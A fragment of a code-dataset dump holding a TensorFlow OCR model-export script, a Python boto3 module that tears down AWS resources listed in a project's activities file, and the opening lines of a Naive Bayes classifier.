= prepare_image(input_image, max_width)\r\n\t\r\n\tnum_images = tf.shape(img_data)[0]\r\n\t\r\n\tencoder_masks = []\r\n\tfor i in xrange(encoder_size + 1):\r\n\t\tencoder_masks.append(\r\n\t\t\ttf.tile([[1.]], [num_images, 1])\r\n\t\t)\r\n\r\n\tdecoder_inputs = []\r\n\ttarget_weights = []\r\n\tfor i in xrange(decoder_size + 1):\r\n\t\tdecoder_inputs.append(\r\n\t\t\ttf.tile([0], [num_images])\r\n\t\t)\r\n\t\tif i < decoder_size:\r\n\t\t\ttarget_weights.append(tf.tile([1.], [num_images]))\r\n\t\telse:\r\n\t\t\ttarget_weights.append(tf.tile([0.], [num_images]))\r\n\t\r\n\tcnn_model = CNN(img_data, False)\r\n\t\r\n\tconv_output = cnn_model.tf_output()\r\n\tperm_conv_output = tf.transpose(conv_output, perm=[1, 0, 2])\r\n\tattention_decoder_model = Seq2SeqModel(\r\n\t\tencoder_masks=encoder_masks,\r\n\t\tencoder_inputs_tensor=perm_conv_output,\r\n\t\tdecoder_inputs=decoder_inputs,\r\n\t\ttarget_weights=target_weights,\r\n\t\ttarget_vocab_size=len(DataGen.CHARMAP),\r\n\t\tbuckets=buckets,\r\n\t\ttarget_embedding_size=target_embedding_size,\r\n\t\tattn_num_layers=attn_num_layers,\r\n\t\tattn_num_hidden=attn_num_hidden,\r\n\t\tforward_only=True,\r\n\t\tuse_gru=use_gru)\r\n\r\n\ttable = tf.contrib.lookup.MutableHashTable(\r\n\t\tkey_dtype=tf.int64,\r\n\t\tvalue_dtype=tf.string,\r\n\t\tdefault_value=\"\",\r\n\t\tcheckpoint=True)\r\n\r\n\tinsert = table.insert(\r\n\t\ttf.constant(list(range(len(DataGen.CHARMAP))), dtype=tf.int64),\r\n\t\ttf.constant(DataGen.CHARMAP))\r\n\t\r\n\twith tf.control_dependencies([insert]):\r\n\t\tnum_feed = []\r\n\t\tprb_feed = []\r\n\r\n\t\tfor line in xrange(len(attention_decoder_model.output)):\r\n\t\t\tguess = tf.argmax(attention_decoder_model.output[line], axis=1)\r\n\t\t\tproba = tf.reduce_max(\r\n\t\t\t\t\ttf.nn.softmax(attention_decoder_model.output[line]), axis=1)\r\n\t\t\tnum_feed.append(guess)\r\n\t\t\tprb_feed.append(proba)\r\n\r\n\t\t# Join the predictions into a single output string.\r\n\t\ttrans_output = tf.transpose(num_feed)\r\n\t\ttrans_output = tf.map_fn(\r\n\t\t\tlambda m: tf.foldr(\r\n\t\t\t\tlambda a, x: tf.cond(\r\n\t\t\t\t\ttf.equal(x, DataGen.EOS_ID),\r\n\t\t\t\t\tlambda: '',\r\n\t\t\t\t\tlambda: table.lookup(x) + a # pylint: disable=undefined-variable\r\n\t\t\t\t),\r\n\t\t\t\tm,\r\n\t\t\t\tinitializer=''\r\n\t\t\t),\r\n\t\t\ttrans_output,\r\n\t\t\tdtype=tf.string\r\n\t\t)\r\n\r\n\t\t# Calculate the total probability of the output string.\r\n\t\ttrans_outprb = tf.transpose(prb_feed)\r\n\t\ttrans_outprb = tf.gather(trans_outprb, tf.range(tf.size(trans_output)))\r\n\t\ttrans_outprb = tf.map_fn(\r\n\t\t\tlambda m: tf.foldr(\r\n\t\t\t\tlambda a, x: tf.multiply(tf.cast(x, tf.float64), a),\r\n\t\t\t\tm,\r\n\t\t\t\tinitializer=tf.cast(1, tf.float64)\r\n\t\t\t),\r\n\t\t\ttrans_outprb,\r\n\t\t\tdtype=tf.float64\r\n\t\t)\r\n\r\n \r\n\t\tprediction = tf.cond(\r\n\t\t\ttf.equal(tf.shape(trans_output)[0], 1),\r\n\t\t\tlambda: trans_output[0],\r\n\t\t\tlambda: trans_output,\r\n\t\t)\r\n\t\tprobability = tf.cond(\r\n\t\t\ttf.equal(tf.shape(trans_outprb)[0], 1),\r\n\t\t\tlambda: trans_outprb[0],\r\n\t\t\tlambda: trans_outprb,\r\n\t\t)\r\n\r\n\t\treturn prediction, probability\r\n\r\ndef main(_):\r\n\t#if not FLAGS.output_file:\r\n\t#\traise ValueError('You must supply the path to save to with --output_file')\r\n\ttf.logging.set_verbosity(tf.logging.INFO)\r\n\twith tf.Graph().as_default() as graph:\r\n\t\t\r\n\t\tinput = tf.placeholder(name='input', dtype=tf.uint8, shape=[None, None, 3])\r\n\t\t\r\n\t\tdevice_id = '/cpu:0'\r\n\t\tif FLAGS.gpu_id >= 0:\r\n\t\t\tdevice_id = '/gpu:' + str(FLAGS.gpu_id)\r\n\t\t\r\n\t\twith tf.device(device_id):\r\n\t\t\r\n\t\t\tprediction, probability = build_graph(input,\r\n\t\t\t\tattn_num_hidden=FLAGS.attn_num_hidden,\r\n\t\t\t\tattn_num_layers=FLAGS.attn_num_layers,\r\n\t\t\t\tuse_gru=FLAGS.use_gru,\r\n\t\t\t\tmax_prediction_length=FLAGS.max_prediction_length,\r\n\t\t\t\tmax_image_height=FLAGS.max_image_height,\r\n\t\t\t\tmax_image_width=FLAGS.max_image_width,\r\n\t\t\t\ttarget_embedding_size=FLAGS.target_embedding_size)\r\n\t\t\r\n\t\t\ttf.identity(prediction, name='prediction')\r\n\t\t\ttf.sigmoid(probability, name='probability')\r\n\t\t\r\n\t\tgraph_def = graph.as_graph_def()\r\n\t\twith gfile.GFile('exported-model/frozen_inference_graph.pb', 'wb') as f:\r\n\t\t\tf.write(graph_def.SerializeToString())\r\n\r\nif __name__ == '__main__':\r\n tf.app.run()\r\n","sub_path":"aocr/export-graph.py","file_name":"export-graph.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552092348","text":"'''\nCreated on Sep 5, 2016\n\n@author: Sunny\n'''\nimport configparser\nimport inspect\nimport os.path\nimport sys\nimport time\nimport datetime\nfrom pprint import pprint\n\nimport boto3\nimport botocore\nimport texttable as tt\nfrom Camellia.Mod import Mod_SetSession,Mod_CreateWorkspace\n\n\nclass cls_DeleteEnvironment:\n activities_File=''\n list_Sections=[]\n list_Sections_Undeleted=[]\n vpc_id=''\n id_Region='us-west-2'\n myobj_SetSession=''\n obj_client_ec2_resource=''\n obj_client_ec2=''\n obj_client_s3=''\n obj_client_sqs=''\n obj_client_dynamodb=''\n obj_client_elasticbeanstalk=''\n file_IniFile_tasks=''\n def __init__(self):\n #CONSTRUCTOR\n print('\\n{:=^80}'.format(''))\n print('\\n{: ^80}'.format('START: ' + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n print('\\n{:=^80}'.format(''))\n #self.file_IniFile_tasks = \"E:\\pythonProgs\\SPOD\\Tasks\".replace(\"\\\\\", \"/\")\n if len(sys.argv) < 2:\n print('No input has been given to Camellia.')\n self.file_IniFile_tasks=str(input('Please provide the path of Tasks directory: ')).replace(\"\\\\\",\"/\")\n else:\n self.file_IniFile_tasks=str(sys.argv[1]).replace(\"\\\\\",\"/\")\n\n obj_Workspace= Mod_CreateWorkspace.cls_CreateWorkspace(self.file_IniFile_tasks)\n dir_workspace=obj_Workspace.m_Return_EnvironmentName()\n self.activities_File=os.path.join(dir_workspace,'Activities.ini').replace(\"\\\\\",\"/\")\n self.m_GetSessionFromActivities()\n self.myobj_SetSession= Mod_SetSession.cls_SetSession()\n \n #self.obj_client_ec2_resource = boto3.resource('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_s3=boto3.client('s3',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_sqs=boto3.client('sqs',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_dynamodb=boto3.client('dynamodb',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n\n def m_PrintInTable(self, str_key, str_value):\n tab = tt.Texttable()\n # tab.set_deco(tab.HEADER)\n # tab.set_deco(2)\n tab.set_cols_width([50, 100])\n tab.set_cols_align(['l', 'l'])\n str_value = ': ' + str_value\n row = [str_key, str_value]\n tab.add_row(row)\n print(tab.draw())\n def m_GetSessionFromActivities(self):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n config = configparser.ConfigParser()\n config.optionxform = str\n config.read(self.activities_File)\n var_Tag='0'\n var_Tag=var_Tag.lower()\n tags_InINI=config.items(var_Tag)\n for tag in tags_InINI:\n self.id_Region=tag[1]\n self.m_PrintInTable('Region',self.id_Region)\n def m_Delete_Activities(self):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n config = configparser.ConfigParser()\n config.optionxform = str\n config.read(self.activities_File)\n for sections in config.sections():\n if sections != '0' : # 0 tag is reserved for Region\n self.list_Sections.append(int(sections))\n print(self.list_Sections)\n self.list_Sections.sort(reverse=True)\n list_sections_str=[]\n for sections in self.list_Sections:\n list_sections_str.append(str(sections))\n self.list_Sections=list_sections_str\n print(self.list_Sections)\n ####################\n #Get VPC ID \n for tags in self.list_Sections:\n myitem=config.items(tags)\n if str(myitem[0][1]).lower()== 'create_vpc'.lower():\n self.vpc_id=str(myitem[1][1]).lower()\n print(self.vpc_id)\n ###################\n for tags in self.list_Sections:\n myitem=config.items(tags)\n b_return=self.m_Delete_Core(myitem)\n if b_return==False:\n self.list_Sections_Undeleted.append(tags)\n print(\"===============================\")\n print('Delete undeleted items')\n if len(self.list_Sections_Undeleted)>0:\n print(self.list_Sections_Undeleted)\n for tags in self.list_Sections_Undeleted:\n myitem=config.items(tags)\n #b_return=self.m_Delete_Core(myitem)\n print(myitem)\n for tags in self.list_Sections_Undeleted:\n myitem=config.items(tags)\n b_return=self.m_Delete_Core(myitem)\n else:\n print(\"No undeleted items\")\n print('\\n{:=^80}'.format(''))\n print('\\n{: ^80}'.format('FINISH: ' + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n print('\\n{:=^80}'.format(''))\n def m_Delete_Core(self,myitem):\n b_return=False\n if str(myitem[0][1]).lower()== 'create_dynamodbtable'.lower():\n #b_return=self.m_Delete_dynamodbtable(myitem[1][1])\n pass\n elif str(myitem[0][1]).lower()== 'create_sqs'.lower():\n #b_return=self.m_Delete_SQS(myitem[1][1])\n pass\n elif str(myitem[0][1]).lower()== 'create_s3bucket'.lower():\n #b_return=self.m_Delete_S3Bucket(myitem[1][1])\n pass\n elif str(myitem[0][1]).lower()== 'create_elasticbeanstalk_application'.lower():\n b_return=self.m_Delete_elasticbeanstalk_application(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_elasticbeanstalk_environment'.lower():\n b_return=self.m_Delete_elasticbeanstalk_environment(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_securitygroup'.lower():\n b_return=self.m_Delete_securitygroup(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_routetable'.lower():\n b_return=self.m_Delete_routetable(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_natgateway'.lower():\n b_return=self.m_Delete_natgateway(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_subnet'.lower():\n b_return=self.m_Delete_subnet(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_internetgateway'.lower():\n b_return=self.m_Delete_internetgateway(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_vpc'.lower():\n b_return=self.m_Delete_vpc(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_elasticip'.lower():\n b_return=self.m_Delete_elasticip(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_rds_dbsubnetgroup'.lower():\n b_return=self.m_Delete_RDS_DBSubnetGroup(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'Create_RDS_DBInstance'.lower():\n b_return=self.m_Delete_RDS_DBInstance(myitem[1][1])\n ###############################\n if b_return==False:\n print('WARNING: Could not delete: ',myitem[1][1])\n else:\n print('Deleted successfully: ',myitem[1][1])\n return b_return\n def m_Delete_Service(self):\n #print('Method type: ',methodType)\n pass\n def m_Delete_dynamodbtable(self,tableName):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_dynamodb=boto3.client('dynamodb',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n response = obj_client_dynamodb.delete_table(TableName=tableName) \n pprint(response)\n self.m_Waiter_dynamodbtableToBeDeleted(tableName)\n print('-----------------------------------------')\n def m_Waiter_dynamodbtableToBeDeleted(self,tableName):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_dynamodb=boto3.client('dynamodb',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n waiter = obj_client_dynamodb.get_waiter('table_not_exists')\n print('Waiting for the table to be deleted: {0}'.format(tableName))\n waiter.wait(TableName=tableName)\n print('Table deleted successfully: ',tableName)\n def m_Delete_SQS(self,queue_Url):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_sqs=boto3.client('sqs',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n response = obj_client_sqs.delete_queue(QueueUrl=queue_Url)\n pprint(response)\n print('-----------------------------------------')\n def m_Delete_S3Bucket(self,bucket_name):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_s3=boto3.client('s3',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n response = obj_client_s3.delete_bucket(Bucket=bucket_name)\n pprint(response)\n self.m_Waiter_S3ToBeDeleted(bucket_name)\n print('-----------------------------------------')\n def m_Waiter_S3ToBeDeleted(self,bucket_name):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_s3=boto3.client('s3',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n waiter = obj_client_s3.get_waiter('bucket_not_exists')\n \n print('Waiting for the bucket {0} to be deleted'.format(bucket_name))\n kwargs={\n 'Bucket':bucket_name\n }\n \n waiter.wait(**kwargs)\n print('Bucket deleted successfully: ',bucket_name)\n def m_Delete_elasticbeanstalk_application(self,elasticbeanstalk_application):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_elasticbeanstalk.delete_application(ApplicationName=elasticbeanstalk_application,TerminateEnvByForce=True)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidParameterValue':\n print(e)\n else:\n print(e)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_elasticbeanstalk_environment(self,elasticbeanstalk_environment):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n self.m_DescribeEnvironmentResources(elasticbeanstalk_environment)\n obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_elasticbeanstalk.terminate_environment(EnvironmentId=elasticbeanstalk_environment,TerminateResources=True,ForceTerminate=True)\n pprint(response)\n self.m_Waiter_elasticbeanstalk_environment_ToBeDeleted(elasticbeanstalk_environment)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidParameterValue':\n print('WARNING: Could not find the Elastic beanstalk Environment ID: ', elasticbeanstalk_environment)\n else:\n print(e)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_DescribeEnvironmentResources(self,id_EnvironmentId):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n print('Resources attached with Elastic beanstalk environment: ',id_EnvironmentId)\n obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n print('...........To do..................')\n kwargs={\n 'EnvironmentId':id_EnvironmentId\n \n }\n pprint(kwargs)\n try:\n response = obj_client_elasticbeanstalk.describe_environment_resources(**kwargs)\n pprint(response['EnvironmentResources'])\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidParameterValue':\n print('WARNING: Could not find the Elastic beanstalk Environment ID: {0}'.format(id_EnvironmentId))\n print('-----------------------------------------')\n def m_Waiter_elasticbeanstalk_environment_ToBeDeleted(self,elasticbeanstalk_environment):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n print('Waiting for the elastic beanstalk environment {0} to be deleted'.format(elasticbeanstalk_environment))\n kwargs={\n 'EnvironmentIds':[\n elasticbeanstalk_environment\n ]\n }\n total_counter=100\n for counter in range(1,total_counter):\n response = obj_client_elasticbeanstalk.describe_environments(**kwargs)\n print('\\n', counter, \".\\t\", response['Environments'][0]['Status'], \"-\\tEB environment: \",elasticbeanstalk_environment, end='\\t')\n if response['Environments'][0]['Status']=='Terminated':\n print('\\n')\n break\n else:\n for i in range(1, 40):\n time.sleep(0.25)\n print('.', end='', flush=True)\n if counter==99:\n print('\\n','Elastic beanstalk environment {0} could not be deleted successfully '.format(elasticbeanstalk_environment))\n def m_Delete_securitygroup(self,securitygroup):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.delete_security_group(DryRun=False,GroupId=securitygroup)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DependencyViolation':\n print(e)\n elif e.response['Error']['Code'] == 'InvalidGroup.NotFound':\n print('WARNING: Could not find the security group: ', securitygroup)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n \n return b_return\n print('-----------------------------------------')\n def m_Delete_routetable(self,routetable):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.describe_route_tables(\n RouteTableIds=[\n routetable,\n ],\n Filters=[\n {\n 'Name': 'route-table-id',\n 'Values': [\n routetable\n ]\n }\n ]\n )\n pprint(response)\n #RouteTableAssociationId=response['RouteTables'][0]['Associations'][0]['RouteTableAssociationId']\n lst1=response['RouteTables'][0]['Associations']\n n=0\n obj_client_ec2_resource = boto3.resource('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n for i in lst1:\n RouteTableAssociationId=lst1[n]['RouteTableAssociationId']\n route_table_association = obj_client_ec2_resource.RouteTableAssociation(RouteTableAssociationId)\n response=route_table_association.get_available_subresources()\n response=route_table_association.delete()\n n+=1\n \n response = obj_client_ec2.delete_route_table(DryRun=False,RouteTableId=routetable)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DependencyViolation':\n print(e)\n elif e.response['Error']['Code'] == 'InvalidRouteTableID.NotFound':\n print('WARNING: Could not find the RouteTable ID: ', routetable)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_natgateway(self,natgateway):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.delete_nat_gateway(NatGatewayId=natgateway)\n pprint(response)\n self.m_Waiter_NATGatewayToBeDeleted(natgateway)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'NatGatewayNotFound':\n print('WARNING: Could not find the NAT gateway: ', natgateway)\n else:\n print(e)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Waiter_NATGatewayToBeDeleted(self,natgateway):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n kwargs={'NatGatewayIds':\n [\n natgateway\n ],\n 'Filters':[\n {\n 'Name':'state',\n 'Values':[\n 'pending' , 'failed' , 'available' , 'deleting','deleted'\n ]\n }\n ],\n 'MaxResults':123\n }\n print('Waiting for the DELETED state of NAT Gateway: {0}'.format(natgateway))\n total_counter=150\n for counter in range(1,total_counter):\n response = obj_client_ec2.describe_nat_gateways(**kwargs)\n print('\\n', counter, \".\\t\", response['NatGateways'][0]['State'], \"-\\tNAT Gateway: \", natgateway, end='\\t')\n if response['NatGateways'][0]['State']=='deleted':\n print('\\n')\n break\n else:\n for i in range(1, 40):\n time.sleep(0.25)\n print('.', end='', flush=True)\n if counter >= 149:\n print('\\n','NAT Gateway {0} could not be deleted successfully: '.format(natgateway))\n def m_Delete_subnet(self,subnet):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.delete_subnet(DryRun=False,SubnetId=subnet)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DependencyViolation':\n print(e)\n elif e.response['Error']['Code'] == 'InvalidSubnetID.NotFound':\n print('WARNING: Could not find the subnet ID: ', subnet)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_internetgateway(self,internetgateway):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n obj_client_ec2.detach_internet_gateway(DryRun=False,InternetGatewayId=internetgateway,VpcId=self.vpc_id)\n response = obj_client_ec2.delete_internet_gateway(DryRun=False,InternetGatewayId=internetgateway)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidInternetGatewayID.NotFound':\n print('WARNING: Could not find the InternetGatewayID: ', internetgateway)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_RDS_DBSubnetGroup(self,rds_dbsubnetgroup):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n #NOTE:The specified database subnet group must not be associated with any DB instances\n obj_rds=boto3.client('rds',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_rds.delete_db_subnet_group(DBSubnetGroupName=rds_dbsubnetgroup)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DBSubnetGroupNotFoundFault':\n print('WARNING: Could not find the dbsubnetgroup: ', rds_dbsubnetgroup)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_RDS_DBInstance(self,rds_dbinstance):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_rds=boto3.client('rds',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n b_return=False\n kwargs={\n 'DBInstanceIdentifier':rds_dbinstance,\n 'SkipFinalSnapshot':True\n }\n response = obj_rds.delete_db_instance(**kwargs)\n pprint(response)\n status_DBInstanceStatus_delete=response['DBInstance']['DBInstanceStatus']\n self.m_Waiter_RDS_DBInstanceToBeDeleted(obj_rds,rds_dbinstance)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DBInstanceNotFound':\n print('WARNING: Could not find the DBInstance: ', rds_dbinstance)\n b_return=True\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Waiter_RDS_DBInstanceToBeDeleted(self,obj_rds,DBInstance):\n print('\\n{:-^80}'.format(inspect.stack()[0][3])) \n print('Waiting for the DBInstanceStatus {0} to be deleted'.format(DBInstance))\n kwargs={\n 'DBInstanceIdentifier':'string'\n }\n kwargs['DBInstanceIdentifier']=DBInstance\n total_counter=180\n for counter in range(1,total_counter):\n response=obj_rds.describe_db_instances(**kwargs)\n status_DBInstanceStatus=response['DBInstances'][0]['DBInstanceStatus']\n print('\\n', counter, \".\\t\", status_DBInstanceStatus,\"-\\tRDS DBInstance: \",DBInstance, end='\\t')\n if status_DBInstanceStatus == 'deleted':\n print('\\n')\n break\n elif status_DBInstanceStatus == 'deleting':\n for i in range(1, 40):\n time.sleep(0.25)\n print('.', end='', flush=True)\n if counter>=179:\n print('\\n','DBInstance {0} could not be deleted successfully '.format(DBInstance))\n def m_Delete_vpc(self,vpc):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n self.m_GetVPCDependencies(vpc)\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.delete_vpc(DryRun=False,VpcId=vpc)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidVpcID.NotFound':\n print('WARNING: Could not find the VPC ID: ', vpc)\n #sys.exit(0)\n elif e.response['Error']['Code'] == 'DependencyViolation':\n #print('WARNING: VPC {0} has dependencies '.format(vpc))\n print(e)\n self.m_GetVPCDependencies(vpc)\n else:\n print(e)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_elasticip(self,elasticip):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.disassociate_address(DryRun=False,AssociationId=elasticip)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidAssociationID.NotFound':\n print('WARNING: Could not find the AssociationID for Elastic IP:', elasticip)\n elif e.response['Error']['Code'] == 'InvalidAllocationID.NotFound':\n print('WARNING: Could not find the AllocationID for Elastic IP:', elasticip)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n try:\n response = obj_client_ec2.release_address(DryRun=False,AllocationId=elasticip)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidAssociationID.NotFound':\n print('WARNING: Could not find the AssociationID for Elastic IP:', elasticip)\n elif e.response['Error']['Code'] == 'InvalidAllocationID.NotFound':\n print('WARNING: Could not find the AllocationID for Elastic IP:', elasticip)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_GetVPCDependencies(self,vpc):\n obj_client_ec2_resource = boto3.resource('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n vpc = obj_client_ec2_resource.Vpc(vpc)\n lst_dependencies=vpc.get_available_subresources()\n print(lst_dependencies)\nmyobj=cls_DeleteEnvironment()\nmyobj.m_Delete_Activities()","sub_path":"Camellia/Mod/Mod_DeleteEnvironment.py","file_name":"Mod_DeleteEnvironment.py","file_ext":"py","file_size_in_byte":29839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"619765035","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: tobiasbraun\n\"\"\"\n\nimport numpy as np\nimport scipy.sparse as spa\n\nclass NaiveBayesClassifier(): \n \n def __init__(self):\n self.is_trained = False\n \n def train(self, train_data: spa.csr_matrix, scores: np.ndarray, alpha = 0.001):\n \"\"\"trains the 